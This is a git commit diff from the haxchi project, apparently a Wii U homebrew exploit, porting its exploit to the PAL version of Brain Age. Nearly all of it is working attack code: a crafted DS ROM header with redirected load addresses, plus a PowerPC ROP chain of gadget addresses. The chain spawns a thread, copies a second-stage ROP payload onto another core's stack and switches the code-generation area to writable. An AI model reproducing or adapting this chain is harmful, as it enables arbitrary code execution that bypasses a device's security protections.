The-Homebrew-Cloud/haxchi
2
0
Fork 0
mirror of https://github.com/wiiu-env/haxchi.git synced 2024-09-28 16:08:35 +02:00
Code Issues Packages Projects Releases Wiki Activity

ported over to the pal version of brain age

Browse Source
This commit is contained in:
FIX94 2016-11-08 00:37:34 +01:00
parent 37443ff760
commit 73c327adf2
2 changed files with 29 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
haxchi.s
View File

@ -1,7 +1,7 @@
.create "haxchi.srl", 0
.nds
hax_target_address equ 0x107968AC
hax_target_address equ 0x1076FAA4
code_target_address equ (0xF4000000 + 0xFD2000)
.org 0x000
@ -15,11 +15,11 @@ code_target_address equ (0xF4000000 + 0xFD2000)
.org 0x020
.word arm9_data ; ARM9 rom_offset
.word 0x20000000 ; ARM9 entry_address
.word 0xEBBC0E00 + code_target_address ; ARM9 ram_address
.word 0xEBDDFC00 + code_target_address ; ARM9 ram_address
.word arm9_data_end - arm9_data ; ARM9 size
.word arm7_data ; ARM7 rom_offset
.word 0x2000000 ; ARM7 entry_address
.word 0xEBBC0E00 + hax_target_address ; ARM7 ram_address
.word 0xEBDDFC00 + hax_target_address ; ARM7 ram_address
.word arm7_data_end - arm7_data ; ARM7 size
.org 0x080

51
haxchi_rop.s
View File

@ -1,23 +1,23 @@
MAIN_STACKTOP equ (0x30796C00)
CORE0_STACKORIG equ (0x2B566050) ; TEMP ?
CORE0_ROPSTART equ (CORE0_STACKORIG + 0x2054) ; TEMP ?
CORE0_STACKORIG equ (0x2B267B50) ; TEMP ?
CORE0_ROPSTART equ (CORE0_STACKORIG + 0xAFC) ; TEMP ?
RPX_OFFSET equ (0x01800000)
COREINIT_OFFSET equ (- 0xFE3C00)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02206FA8)
BCTRL equ (RPX_OFFSET + 0x02206FBC)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E92C8)
LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR equ (RPX_OFFSET + 0x02026DE0)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C)
MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02208E90)
BCTRL equ (RPX_OFFSET + 0x02208EA4)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500)
LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E0108)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8)
MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
HACHI_APPLICATION_PTR equ (0x10c8c938)
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774)
;HACHI_APPLICATION_PTR equ (0x10A6E038) ;probably wrong
OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)
OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)
@ -27,15 +27,15 @@ OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)
MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)
DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)
IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)
SYS_LAUNCHSETTINGS equ (0x03B9B25C)
_EXIT equ (0x0229a240 + RPX_OFFSET)
exit equ (0x022924b0 + RPX_OFFSET)
;SYS_LAUNCHSETTINGS equ (0x03B9B25C)
;_EXIT equ (0x0229a240 + RPX_OFFSET)
;exit equ (0x022924b0 + RPX_OFFSET)
OSFATAL equ (0x02015218 + COREINIT_OFFSET)
CODEGEN_ADR equ 0x01800000
NERD_THREADOBJECT equ (0x107968AC - 0x1000)
NERD_THREADOBJECT equ (0x1076FAA4 - 0x1000)
.macro set_sp,v
.word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR
@ -134,7 +134,7 @@ NERD_THREADOBJECT equ (0x107968AC - 0x1000)
.create "haxchi_rop_hook.bin", 0x107968AC
.create "haxchi_rop_hook.bin", 0x1076FAA4
.arm.big
rop_hook_start:
@ -150,10 +150,9 @@ rop_hook_start:
.arm.big
rop_start:
; call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
; call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0
;call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
;call_func OSFATAL, 0x1007E7A8, 0, 0, 0
;call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0
; call_func exit, 0, 0, 0, 0
; call_func _EXIT, 0, 0, 0, 0
; .word _EXIT
@ -163,13 +162,15 @@ rop_start:
; .word 0xDEADBABE ; garbage
; .word 0xDEADBABE ; garbage
; .word 0xDEADBABE ; garbage
call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR, 0xDEAD0DAD, thread_param, 0x0, 0x0
call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR, 0x1007E7A8, thread_param, 0x0, 0x0
call_func OS_GETTHREADAFFINITY, NERD_THREADOBJECT, 0, 0, 0
call_func MEMCPY, CORE0_ROPSTART, core0rop, core0rop_end - core0rop, 0x0
call_func NERD_STARTTHREAD, NERD_THREADOBJECT, 0x0, 0x0, 0x0
;call_func DC_FLUSHRANGE, 0x1076EAA4, 0x1000, 0x0, 0x0
call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop
core0rop:
; .word OSFATAL
; switch codegen to RW
call_func OSCODEGEN_SWITCHSECMODE, 0x0, 0x0, 0x0, 0x0